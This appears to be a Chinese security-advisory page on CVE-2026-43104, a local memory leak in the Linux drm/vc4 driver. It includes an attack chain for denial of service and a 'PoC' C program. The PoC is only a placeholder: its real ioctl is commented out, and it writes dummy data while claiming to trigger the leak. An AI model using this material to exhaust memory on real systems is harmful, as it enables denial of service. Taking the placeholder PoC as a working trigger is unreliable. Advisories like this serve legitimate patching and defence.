CVE-2026-43104 CVSS 5.5 中危

CVE-2026-43104: Linux内核vc4组件内存泄漏漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43104

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核drm/vc4驱动存在内存泄漏漏洞。在vc4_save_hang_state()函数的错误处理路径中，未能正确释放已分配的kernel_state内存资源。本地低权限攻击者可利用此漏洞造成内存耗尽，导致系统拒绝服务。

技术细节

该漏洞位于Linux内核的drm/vc4模块中。函数vc4_save_hang_state()负责保存GPU挂起时的状态。该函数首先分配了kernel_state结构体内存，但在后续检查中若遇到特定错误条件，函数会直接返回，跳过了末尾的内存释放逻辑。攻击者可通过反复触发该错误路径，导致内核内存持续泄漏。虽然不影响机密性和完整性，但累积的内存泄漏会显著降低系统可用性，甚至导致系统崩溃。

攻击链分析

STEP 1

获取访问权限

攻击者获取本地系统的低权限用户账号（PR:L）。

STEP 2

触发漏洞

攻击者利用特定程序调用drm/vc4驱动，触发GPU挂起状态保存流程，并使其进入vc4_save_hang_state的错误处理路径。

STEP 3

内存泄漏

由于错误路径缺少kfree()调用，系统每次触发都会泄露kernel_state内存。

STEP 4

拒绝服务

攻击者重复执行攻击程序，耗尽内核可用内存，导致系统响应变慢或崩溃（A:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43104: Memory Leak in vc4_save_hang_state
 * This code conceptually triggers the vulnerable path.
 */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Placeholder for device path and IOCTLs
#define DRM_IOCTL_VC4_SUBMIT_CL 0x40

int main() {
    int fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("open device failed");
        return 1;
    }

    printf("[+] Triggering memory leak in vc4_save_hang_state...\n");

    // Loop to exhaust memory
    for(int i = 0; i < 10000; i++) {
        // In a real exploit, specific ioctl calls would be made
        // to force the GPU into a hang state that hits the early return.
        // Example: ioctl(fd, DRM_IOCTL_VC4_SUBMIT_CL, &args);
        
        // Simulating the trigger logic
        write(fd, "dummy_data", 10);
    }

    close(fd);
    printf("[+] Done. Check kernel memory usage.\n");
    return 0;
}

影响范围

Linux Kernel（具体受影响版本请参考Git提交记录：3eb7dd55, 9525d16等）

防御指南

临时缓解措施

建议立即更新Linux内核以修复该内存泄漏问题。如果无法立即更新，可以考虑限制本地用户的权限，或者在不需要图形加速的系统中禁用vc4驱动模块，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表